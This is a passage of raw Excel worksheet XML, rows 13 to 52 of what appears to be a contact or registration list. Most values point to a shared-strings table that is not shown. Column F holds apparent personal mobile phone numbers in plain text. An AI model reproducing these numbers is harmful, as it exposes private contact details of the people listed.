      <c r="L12" s="14"/>
    </row>
    <row r="13" s="6" customFormat="true" ht="28.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A13" s="13" t="n">
        <v>10</v>
      </c>
      <c r="B13" s="14" t="s">
        <v>115</v>
      </c>
      <c r="C13" s="14" t="s">
        <v>119</v>
      </c>
      <c r="D13" s="15" t="s">
        <v>123</v>
      </c>
      <c r="E13" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F13" s="13" t="n">
        <v>13996909607</v>
      </c>
      <c r="G13" s="14" t="s">
        <v>121</v>
      </c>
      <c r="H13" s="14" t="s">
        <v>124</v>
      </c>
      <c r="I13" s="15"/>
      <c r="J13" s="15"/>
      <c r="K13" s="14"/>
      <c r="L13" s="14"/>
    </row>
    <row r="14" s="6" customFormat="true" ht="43.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A14" s="13" t="n">
        <v>11</v>
      </c>
      <c r="B14" s="14" t="s">
        <v>125</v>
      </c>
      <c r="C14" s="14" t="s">
        <v>126</v>
      </c>
      <c r="D14" s="15" t="s">
        <v>127</v>
      </c>
      <c r="E14" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F14" s="13" t="n">
        <v>13983565870</v>
      </c>
      <c r="G14" s="14" t="s">
        <v>128</v>
      </c>
      <c r="H14" s="14"/>
      <c r="I14" s="15"/>
      <c r="J14" s="15"/>
      <c r="K14" s="14"/>
      <c r="L14" s="14"/>
    </row>
    <row r="15" s="6" customFormat="true" ht="28.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A15" s="13" t="n">
        <v>12</v>
      </c>
      <c r="B15" s="14" t="s">
        <v>125</v>
      </c>
      <c r="C15" s="14" t="s">
        <v>126</v>
      </c>
      <c r="D15" s="15" t="s">
        <v>129</v>
      </c>
      <c r="E15" s="14" t="s">
        <v>91</v>
      </c>
      <c r="F15" s="13" t="n">
        <v>13983565870</v>
      </c>
      <c r="G15" s="14" t="s">
        <v>130</v>
      </c>
      <c r="H15" s="14" t="s">
        <v>131</v>
      </c>
      <c r="I15" s="15"/>
      <c r="J15" s="15"/>
      <c r="K15" s="14"/>
      <c r="L15" s="14"/>
    </row>
    <row r="16" s="6" customFormat="true" ht="30" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A16" s="13" t="n">
        <v>13</v>
      </c>
      <c r="B16" s="14" t="s">
        <v>132</v>
      </c>
      <c r="C16" s="14" t="s">
        <v>133</v>
      </c>
      <c r="D16" s="15" t="s">
        <v>134</v>
      </c>
      <c r="E16" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F16" s="13" t="n">
        <v>13983574333</v>
      </c>
      <c r="G16" s="14" t="s">
        <v>108</v>
      </c>
      <c r="H16" s="14" t="s">
        <v>135</v>
      </c>
      <c r="I16" s="15"/>
      <c r="J16" s="15"/>
      <c r="K16" s="14"/>
      <c r="L16" s="14"/>
    </row>
    <row r="17" s="6" customFormat="true" ht="40.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A17" s="13" t="n">
        <v>14</v>
      </c>
      <c r="B17" s="14" t="s">
        <v>132</v>
      </c>
      <c r="C17" s="14" t="s">
        <v>133</v>
      </c>
      <c r="D17" s="15" t="s">
        <v>136</v>
      </c>
      <c r="E17" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F17" s="13" t="n">
        <v>13983574333</v>
      </c>
      <c r="G17" s="14" t="s">
        <v>124</v>
      </c>
      <c r="H17" s="14" t="s">
        <v>135</v>
      </c>
      <c r="I17" s="15"/>
      <c r="J17" s="15"/>
      <c r="K17" s="14"/>
      <c r="L17" s="14"/>
    </row>
    <row r="18" s="6" customFormat="true" ht="30" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A18" s="13" t="n">
        <v>15</v>
      </c>
      <c r="B18" s="14" t="s">
        <v>137</v>
      </c>
      <c r="C18" s="14" t="s">
        <v>138</v>
      </c>
      <c r="D18" s="15" t="s">
        <v>139</v>
      </c>
      <c r="E18" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F18" s="13" t="n">
        <v>13709499001</v>
      </c>
      <c r="G18" s="14" t="s">
        <v>140</v>
      </c>
      <c r="H18" s="14"/>
      <c r="I18" s="15"/>
      <c r="J18" s="15"/>
      <c r="K18" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L18" s="16" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="19" s="6" customFormat="true" ht="28.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A19" s="13" t="n">
        <v>16</v>
      </c>
      <c r="B19" s="14" t="s">
        <v>141</v>
      </c>
      <c r="C19" s="14" t="s">
        <v>142</v>
      </c>
      <c r="D19" s="15" t="s">
        <v>143</v>
      </c>
      <c r="E19" s="14" t="s">
        <v>95</v>
      </c>
      <c r="F19" s="13" t="n">
        <v>13896401222</v>
      </c>
      <c r="G19" s="14" t="s">
        <v>97</v>
      </c>
      <c r="H19" s="14"/>
      <c r="I19" s="15"/>
      <c r="J19" s="15"/>
      <c r="K19" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L19" s="16" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="20" s="6" customFormat="true" ht="54" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A20" s="13" t="n">
        <v>17</v>
      </c>
      <c r="B20" s="14" t="s">
        <v>144</v>
      </c>
      <c r="C20" s="14" t="s">
        <v>145</v>
      </c>
      <c r="D20" s="15" t="s">
        <v>146</v>
      </c>
      <c r="E20" s="14" t="s">
        <v>91</v>
      </c>
      <c r="F20" s="13" t="n">
        <v>13996938309</v>
      </c>
      <c r="G20" s="14" t="s">
        <v>147</v>
      </c>
      <c r="H20" s="14" t="s">
        <v>148</v>
      </c>
      <c r="I20" s="15"/>
      <c r="J20" s="15"/>
      <c r="K20" s="14"/>
      <c r="L20" s="14"/>
    </row>
    <row r="21" s="6" customFormat="true" ht="28.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A21" s="13" t="n">
        <v>18</v>
      </c>
      <c r="B21" s="14" t="s">
        <v>149</v>
      </c>
      <c r="C21" s="14" t="s">
        <v>150</v>
      </c>
      <c r="D21" s="15" t="s">
        <v>151</v>
      </c>
      <c r="E21" s="14" t="s">
        <v>152</v>
      </c>
      <c r="F21" s="13" t="n">
        <v>13628400799</v>
      </c>
      <c r="G21" s="14" t="s">
        <v>128</v>
      </c>
      <c r="H21" s="14" t="s">
        <v>153</v>
      </c>
      <c r="I21" s="14" t="s">
        <v>98</v>
      </c>
      <c r="J21" s="14" t="s">
        <v>154</v>
      </c>
      <c r="K21" s="14"/>
      <c r="L21" s="14"/>
    </row>
    <row r="22" s="6" customFormat="true" ht="40.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A22" s="13" t="n">
        <v>19</v>
      </c>
      <c r="B22" s="14" t="s">
        <v>155</v>
      </c>
      <c r="C22" s="14" t="s">
        <v>156</v>
      </c>
      <c r="D22" s="15" t="s">
        <v>157</v>
      </c>
      <c r="E22" s="14" t="s">
        <v>158</v>
      </c>
      <c r="F22" s="13" t="n">
        <v>13898654279</v>
      </c>
      <c r="G22" s="14" t="s">
        <v>159</v>
      </c>
      <c r="H22" s="14" t="s">
        <v>160</v>
      </c>
      <c r="I22" s="15"/>
      <c r="J22" s="15"/>
      <c r="K22" s="14"/>
      <c r="L22" s="14"/>
    </row>
    <row r="23" s="6" customFormat="true" ht="28.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A23" s="13" t="n">
        <v>20</v>
      </c>
      <c r="B23" s="14" t="s">
        <v>161</v>
      </c>
      <c r="C23" s="14" t="s">
        <v>162</v>
      </c>
      <c r="D23" s="15" t="s">
        <v>163</v>
      </c>
      <c r="E23" s="14" t="s">
        <v>91</v>
      </c>
      <c r="F23" s="13" t="n">
        <v>13896423968</v>
      </c>
      <c r="G23" s="14" t="s">
        <v>108</v>
      </c>
      <c r="H23" s="14" t="s">
        <v>131</v>
      </c>
      <c r="I23" s="15"/>
      <c r="J23" s="15"/>
      <c r="K23" s="14"/>
      <c r="L23" s="14"/>
    </row>
    <row r="24" s="6" customFormat="true" ht="28.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A24" s="13" t="n">
        <v>21</v>
      </c>
      <c r="B24" s="14" t="s">
        <v>164</v>
      </c>
      <c r="C24" s="14" t="s">
        <v>165</v>
      </c>
      <c r="D24" s="15" t="s">
        <v>166</v>
      </c>
      <c r="E24" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F24" s="13" t="n">
        <v>13452299990</v>
      </c>
      <c r="G24" s="14" t="s">
        <v>108</v>
      </c>
      <c r="H24" s="14"/>
      <c r="I24" s="15"/>
      <c r="J24" s="15"/>
      <c r="K24" s="14"/>
      <c r="L24" s="14"/>
    </row>
    <row r="25" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A25" s="13" t="n">
        <v>22</v>
      </c>
      <c r="B25" s="14" t="s">
        <v>164</v>
      </c>
      <c r="C25" s="14" t="s">
        <v>165</v>
      </c>
      <c r="D25" s="15" t="s">
        <v>167</v>
      </c>
      <c r="E25" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F25" s="13" t="n">
        <v>13452299990</v>
      </c>
      <c r="G25" s="14" t="s">
        <v>118</v>
      </c>
      <c r="H25" s="14" t="s">
        <v>92</v>
      </c>
      <c r="I25" s="15"/>
      <c r="J25" s="15"/>
      <c r="K25" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L25" s="16" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="26" s="6" customFormat="true" ht="40.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A26" s="13" t="n">
        <v>23</v>
      </c>
      <c r="B26" s="14" t="s">
        <v>164</v>
      </c>
      <c r="C26" s="14" t="s">
        <v>165</v>
      </c>
      <c r="D26" s="15" t="s">
        <v>169</v>
      </c>
      <c r="E26" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F26" s="13" t="n">
        <v>13452299990</v>
      </c>
      <c r="G26" s="14" t="s">
        <v>92</v>
      </c>
      <c r="H26" s="14" t="s">
        <v>121</v>
      </c>
      <c r="I26" s="15"/>
      <c r="J26" s="15"/>
      <c r="K26" s="14"/>
      <c r="L26" s="14"/>
    </row>
    <row r="27" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A27" s="13" t="n">
        <v>24</v>
      </c>
      <c r="B27" s="14" t="s">
        <v>164</v>
      </c>
      <c r="C27" s="14" t="s">
        <v>165</v>
      </c>
      <c r="D27" s="15" t="s">
        <v>170</v>
      </c>
      <c r="E27" s="14" t="s">
        <v>91</v>
      </c>
      <c r="F27" s="13" t="n">
        <v>13452299990</v>
      </c>
      <c r="G27" s="14" t="s">
        <v>97</v>
      </c>
      <c r="H27" s="14" t="s">
        <v>171</v>
      </c>
      <c r="I27" s="15"/>
      <c r="J27" s="15"/>
      <c r="K27" s="14"/>
      <c r="L27" s="14"/>
    </row>
    <row r="28" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A28" s="13" t="n">
        <v>25</v>
      </c>
      <c r="B28" s="14" t="s">
        <v>164</v>
      </c>
      <c r="C28" s="14" t="s">
        <v>165</v>
      </c>
      <c r="D28" s="15" t="s">
        <v>172</v>
      </c>
      <c r="E28" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F28" s="13" t="n">
        <v>13452299990</v>
      </c>
      <c r="G28" s="14" t="s">
        <v>92</v>
      </c>
      <c r="H28" s="14"/>
      <c r="I28" s="15"/>
      <c r="J28" s="15"/>
      <c r="K28" s="14"/>
      <c r="L28" s="14"/>
    </row>
    <row r="29" s="6" customFormat="true" ht="28.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A29" s="13" t="n">
        <v>26</v>
      </c>
      <c r="B29" s="14" t="s">
        <v>173</v>
      </c>
      <c r="C29" s="14" t="s">
        <v>174</v>
      </c>
      <c r="D29" s="15" t="s">
        <v>175</v>
      </c>
      <c r="E29" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F29" s="13" t="n">
        <v>13648289328</v>
      </c>
      <c r="G29" s="14" t="s">
        <v>176</v>
      </c>
      <c r="H29" s="14"/>
      <c r="I29" s="15"/>
      <c r="J29" s="15"/>
      <c r="K29" s="14"/>
      <c r="L29" s="14"/>
    </row>
    <row r="30" s="6" customFormat="true" ht="45" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A30" s="13" t="n">
        <v>27</v>
      </c>
      <c r="B30" s="14" t="s">
        <v>177</v>
      </c>
      <c r="C30" s="14" t="s">
        <v>178</v>
      </c>
      <c r="D30" s="15" t="s">
        <v>179</v>
      </c>
      <c r="E30" s="14" t="s">
        <v>152</v>
      </c>
      <c r="F30" s="13" t="s">
        <v>180</v>
      </c>
      <c r="G30" s="14" t="s">
        <v>102</v>
      </c>
      <c r="H30" s="14" t="s">
        <v>181</v>
      </c>
      <c r="I30" s="15"/>
      <c r="J30" s="15"/>
      <c r="K30" s="14"/>
      <c r="L30" s="14"/>
    </row>
    <row r="31" s="6" customFormat="true" ht="45" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A31" s="13" t="n">
        <v>28</v>
      </c>
      <c r="B31" s="14" t="s">
        <v>177</v>
      </c>
      <c r="C31" s="14" t="s">
        <v>178</v>
      </c>
      <c r="D31" s="15" t="s">
        <v>182</v>
      </c>
      <c r="E31" s="14" t="s">
        <v>152</v>
      </c>
      <c r="F31" s="13" t="s">
        <v>180</v>
      </c>
      <c r="G31" s="14" t="s">
        <v>183</v>
      </c>
      <c r="H31" s="14" t="s">
        <v>184</v>
      </c>
      <c r="I31" s="15"/>
      <c r="J31" s="15"/>
      <c r="K31" s="14"/>
      <c r="L31" s="14"/>
    </row>
    <row r="32" s="6" customFormat="true" ht="60" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A32" s="13" t="n">
        <v>29</v>
      </c>
      <c r="B32" s="14" t="s">
        <v>177</v>
      </c>
      <c r="C32" s="14" t="s">
        <v>178</v>
      </c>
      <c r="D32" s="15" t="s">
        <v>185</v>
      </c>
      <c r="E32" s="14" t="s">
        <v>152</v>
      </c>
      <c r="F32" s="13" t="s">
        <v>180</v>
      </c>
      <c r="G32" s="14" t="s">
        <v>183</v>
      </c>
      <c r="H32" s="14" t="s">
        <v>186</v>
      </c>
      <c r="I32" s="15"/>
      <c r="J32" s="15"/>
      <c r="K32" s="14"/>
      <c r="L32" s="14"/>
    </row>
    <row r="33" s="6" customFormat="true" ht="60.75" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A33" s="13" t="n">
        <v>30</v>
      </c>
      <c r="B33" s="14" t="s">
        <v>177</v>
      </c>
      <c r="C33" s="14" t="s">
        <v>178</v>
      </c>
      <c r="D33" s="15" t="s">
        <v>187</v>
      </c>
      <c r="E33" s="14" t="s">
        <v>152</v>
      </c>
      <c r="F33" s="13" t="s">
        <v>180</v>
      </c>
      <c r="G33" s="14" t="s">
        <v>183</v>
      </c>
      <c r="H33" s="14" t="s">
        <v>188</v>
      </c>
      <c r="I33" s="15"/>
      <c r="J33" s="15"/>
      <c r="K33" s="14"/>
      <c r="L33" s="14"/>
    </row>
    <row r="34" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A34" s="13" t="n">
        <v>31</v>
      </c>
      <c r="B34" s="14" t="s">
        <v>189</v>
      </c>
      <c r="C34" s="14" t="s">
        <v>190</v>
      </c>
      <c r="D34" s="15" t="s">
        <v>191</v>
      </c>
      <c r="E34" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F34" s="13" t="n">
        <v>18723997017</v>
      </c>
      <c r="G34" s="14" t="s">
        <v>192</v>
      </c>
      <c r="H34" s="14"/>
      <c r="I34" s="15"/>
      <c r="J34" s="15"/>
      <c r="K34" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L34" s="16" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="35" s="6" customFormat="true" ht="44.25" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A35" s="13" t="n">
        <v>32</v>
      </c>
      <c r="B35" s="14" t="s">
        <v>189</v>
      </c>
      <c r="C35" s="14" t="s">
        <v>190</v>
      </c>
      <c r="D35" s="15" t="s">
        <v>194</v>
      </c>
      <c r="E35" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F35" s="13" t="n">
        <v>18723997017</v>
      </c>
      <c r="G35" s="14" t="s">
        <v>195</v>
      </c>
      <c r="H35" s="14" t="s">
        <v>97</v>
      </c>
      <c r="I35" s="15"/>
      <c r="J35" s="15"/>
      <c r="K35" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L35" s="16" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="36" s="6" customFormat="true" ht="44.25" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A36" s="13" t="n">
        <v>33</v>
      </c>
      <c r="B36" s="14" t="s">
        <v>196</v>
      </c>
      <c r="C36" s="14" t="s">
        <v>197</v>
      </c>
      <c r="D36" s="15" t="s">
        <v>198</v>
      </c>
      <c r="E36" s="14" t="s">
        <v>158</v>
      </c>
      <c r="F36" s="13" t="n">
        <v>15923755248</v>
      </c>
      <c r="G36" s="14" t="s">
        <v>159</v>
      </c>
      <c r="H36" s="14"/>
      <c r="I36" s="15"/>
      <c r="J36" s="15"/>
      <c r="K36" s="14"/>
      <c r="L36" s="14"/>
    </row>
    <row r="37" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A37" s="13" t="n">
        <v>34</v>
      </c>
      <c r="B37" s="14" t="s">
        <v>196</v>
      </c>
      <c r="C37" s="14" t="s">
        <v>197</v>
      </c>
      <c r="D37" s="15" t="s">
        <v>199</v>
      </c>
      <c r="E37" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F37" s="13" t="n">
        <v>15923755248</v>
      </c>
      <c r="G37" s="14" t="s">
        <v>183</v>
      </c>
      <c r="H37" s="14"/>
      <c r="I37" s="15"/>
      <c r="J37" s="15"/>
      <c r="K37" s="14"/>
      <c r="L37" s="14"/>
    </row>
    <row r="38" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A38" s="13" t="n">
        <v>35</v>
      </c>
      <c r="B38" s="14" t="s">
        <v>196</v>
      </c>
      <c r="C38" s="14" t="s">
        <v>197</v>
      </c>
      <c r="D38" s="15" t="s">
        <v>200</v>
      </c>
      <c r="E38" s="14" t="s">
        <v>95</v>
      </c>
      <c r="F38" s="13" t="n">
        <v>15923755248</v>
      </c>
      <c r="G38" s="14" t="s">
        <v>111</v>
      </c>
      <c r="H38" s="14" t="s">
        <v>201</v>
      </c>
      <c r="I38" s="15"/>
      <c r="J38" s="15"/>
      <c r="K38" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L38" s="16" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="39" s="6" customFormat="true" ht="30" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A39" s="13" t="n">
        <v>36</v>
      </c>
      <c r="B39" s="14" t="s">
        <v>202</v>
      </c>
      <c r="C39" s="14" t="s">
        <v>203</v>
      </c>
      <c r="D39" s="15" t="s">
        <v>204</v>
      </c>
      <c r="E39" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F39" s="13" t="n">
        <v>13452282092</v>
      </c>
      <c r="G39" s="14" t="s">
        <v>111</v>
      </c>
      <c r="H39" s="14" t="s">
        <v>192</v>
      </c>
      <c r="I39" s="15"/>
      <c r="J39" s="15"/>
      <c r="K39" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L39" s="16" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="40" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A40" s="13" t="n">
        <v>37</v>
      </c>
      <c r="B40" s="14" t="s">
        <v>205</v>
      </c>
      <c r="C40" s="14" t="s">
        <v>206</v>
      </c>
      <c r="D40" s="15" t="s">
        <v>207</v>
      </c>
      <c r="E40" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F40" s="13" t="n">
        <v>13709493185</v>
      </c>
      <c r="G40" s="14" t="s">
        <v>195</v>
      </c>
      <c r="H40" s="14"/>
      <c r="I40" s="15"/>
      <c r="J40" s="15"/>
      <c r="K40" s="14"/>
      <c r="L40" s="14"/>
    </row>
    <row r="41" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A41" s="13" t="n">
        <v>38</v>
      </c>
      <c r="B41" s="14" t="s">
        <v>208</v>
      </c>
      <c r="C41" s="14" t="s">
        <v>209</v>
      </c>
      <c r="D41" s="15" t="s">
        <v>210</v>
      </c>
      <c r="E41" s="14" t="s">
        <v>91</v>
      </c>
      <c r="F41" s="13" t="n">
        <v>13452216756</v>
      </c>
      <c r="G41" s="14" t="s">
        <v>153</v>
      </c>
      <c r="H41" s="14"/>
      <c r="I41" s="15"/>
      <c r="J41" s="15"/>
      <c r="K41" s="14"/>
      <c r="L41" s="14"/>
    </row>
    <row r="42" s="6" customFormat="true" ht="42" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A42" s="13" t="n">
        <v>39</v>
      </c>
      <c r="B42" s="14" t="s">
        <v>208</v>
      </c>
      <c r="C42" s="14" t="s">
        <v>209</v>
      </c>
      <c r="D42" s="15" t="s">
        <v>211</v>
      </c>
      <c r="E42" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F42" s="13" t="n">
        <v>13452216756</v>
      </c>
      <c r="G42" s="14" t="s">
        <v>192</v>
      </c>
      <c r="H42" s="14" t="s">
        <v>111</v>
      </c>
      <c r="I42" s="15"/>
      <c r="J42" s="15"/>
      <c r="K42" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L42" s="16" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="43" s="6" customFormat="true" ht="63" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A43" s="13" t="n">
        <v>40</v>
      </c>
      <c r="B43" s="14" t="s">
        <v>212</v>
      </c>
      <c r="C43" s="14" t="s">
        <v>213</v>
      </c>
      <c r="D43" s="15" t="s">
        <v>214</v>
      </c>
      <c r="E43" s="14" t="s">
        <v>152</v>
      </c>
      <c r="F43" s="13" t="n">
        <v>13648280118</v>
      </c>
      <c r="G43" s="14" t="s">
        <v>131</v>
      </c>
      <c r="H43" s="14" t="s">
        <v>195</v>
      </c>
      <c r="I43" s="15"/>
      <c r="J43" s="15"/>
      <c r="K43" s="14"/>
      <c r="L43" s="14"/>
    </row>
    <row r="44" s="6" customFormat="true" ht="51.75" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A44" s="13" t="n">
        <v>41</v>
      </c>
      <c r="B44" s="14" t="s">
        <v>212</v>
      </c>
      <c r="C44" s="14" t="s">
        <v>213</v>
      </c>
      <c r="D44" s="15" t="s">
        <v>215</v>
      </c>
      <c r="E44" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F44" s="13" t="n">
        <v>13648280118</v>
      </c>
      <c r="G44" s="14" t="s">
        <v>195</v>
      </c>
      <c r="H44" s="14" t="s">
        <v>121</v>
      </c>
      <c r="I44" s="15"/>
      <c r="J44" s="15"/>
      <c r="K44" s="14"/>
      <c r="L44" s="14"/>
    </row>
    <row r="45" s="6" customFormat="true" ht="146.25" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A45" s="13" t="n">
        <v>42</v>
      </c>
      <c r="B45" s="14" t="s">
        <v>216</v>
      </c>
      <c r="C45" s="14" t="s">
        <v>217</v>
      </c>
      <c r="D45" s="15" t="s">
        <v>218</v>
      </c>
      <c r="E45" s="14" t="s">
        <v>95</v>
      </c>
      <c r="F45" s="13" t="s">
        <v>219</v>
      </c>
      <c r="G45" s="14" t="s">
        <v>220</v>
      </c>
      <c r="H45" s="14" t="s">
        <v>221</v>
      </c>
      <c r="I45" s="15"/>
      <c r="J45" s="15"/>
      <c r="K45" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L45" s="16" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="46" s="6" customFormat="true" ht="40.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A46" s="13" t="n">
        <v>43</v>
      </c>
      <c r="B46" s="14" t="s">
        <v>222</v>
      </c>
      <c r="C46" s="14" t="s">
        <v>223</v>
      </c>
      <c r="D46" s="15" t="s">
        <v>224</v>
      </c>
      <c r="E46" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F46" s="13" t="n">
        <v>17783159888</v>
      </c>
      <c r="G46" s="14" t="s">
        <v>153</v>
      </c>
      <c r="H46" s="14" t="s">
        <v>225</v>
      </c>
      <c r="I46" s="15"/>
      <c r="J46" s="15"/>
      <c r="K46" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L46" s="16" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="47" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A47" s="13" t="n">
        <v>44</v>
      </c>
      <c r="B47" s="14" t="s">
        <v>226</v>
      </c>
      <c r="C47" s="14" t="s">
        <v>227</v>
      </c>
      <c r="D47" s="15" t="s">
        <v>228</v>
      </c>
      <c r="E47" s="14" t="s">
        <v>152</v>
      </c>
      <c r="F47" s="13" t="n">
        <v>13594934619</v>
      </c>
      <c r="G47" s="14" t="s">
        <v>229</v>
      </c>
      <c r="H47" s="14" t="s">
        <v>131</v>
      </c>
      <c r="I47" s="15"/>
      <c r="J47" s="15"/>
      <c r="K47" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L47" s="16" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="48" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A48" s="13" t="n">
        <v>45</v>
      </c>
      <c r="B48" s="14" t="s">
        <v>230</v>
      </c>
      <c r="C48" s="14" t="s">
        <v>231</v>
      </c>
      <c r="D48" s="15" t="s">
        <v>232</v>
      </c>
      <c r="E48" s="14" t="s">
        <v>158</v>
      </c>
      <c r="F48" s="13" t="n">
        <v>15823619066</v>
      </c>
      <c r="G48" s="14" t="s">
        <v>229</v>
      </c>
      <c r="H48" s="14"/>
      <c r="I48" s="15"/>
      <c r="J48" s="15"/>
      <c r="K48" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L48" s="16" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="49" s="6" customFormat="true" ht="40.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A49" s="13" t="n">
        <v>46</v>
      </c>
      <c r="B49" s="14" t="s">
        <v>233</v>
      </c>
      <c r="C49" s="14" t="s">
        <v>234</v>
      </c>
      <c r="D49" s="15" t="s">
        <v>235</v>
      </c>
      <c r="E49" s="14" t="s">
        <v>152</v>
      </c>
      <c r="F49" s="13" t="n">
        <v>15856056000</v>
      </c>
      <c r="G49" s="14" t="s">
        <v>131</v>
      </c>
      <c r="H49" s="14" t="s">
        <v>236</v>
      </c>
      <c r="I49" s="15"/>
      <c r="J49" s="15"/>
      <c r="K49" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L49" s="16" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="50" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A50" s="13" t="n">
        <v>47</v>
      </c>
      <c r="B50" s="14" t="s">
        <v>237</v>
      </c>
      <c r="C50" s="14" t="s">
        <v>238</v>
      </c>
      <c r="D50" s="15" t="s">
        <v>239</v>
      </c>
      <c r="E50" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F50" s="13" t="n">
        <v>15923782759</v>
      </c>
      <c r="G50" s="14" t="s">
        <v>240</v>
      </c>
      <c r="H50" s="14"/>
      <c r="I50" s="15"/>
      <c r="J50" s="15"/>
      <c r="K50" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L50" s="16" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="51" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A51" s="13" t="n">
        <v>48</v>
      </c>
      <c r="B51" s="14" t="s">
        <v>241</v>
      </c>
      <c r="C51" s="14" t="s">
        <v>242</v>
      </c>
      <c r="D51" s="15" t="s">
        <v>243</v>
      </c>
      <c r="E51" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F51" s="13" t="n">
        <v>13896877763</v>
      </c>
      <c r="G51" s="14" t="s">
        <v>201</v>
      </c>
      <c r="H51" s="14"/>
      <c r="I51" s="15"/>
      <c r="J51" s="15"/>
      <c r="K51" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L51" s="16" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="52" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A52" s="13" t="n">
        <v>49</v>
      </c>
      <c r="B52" s="14" t="s">
        <v>241</v>
      </c>
      <c r="C52" s="14" t="s">
        <v>242</v>
      </c>
      <c r="D52" s="15" t="s">
        <v>244</v>
      </c>
      <c r="E52" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F52" s="13" t="n">
        <v>13896877763</v>
      </c>
      <c r="G52" s="14" t="s">
        <v>153</v>
      </c>
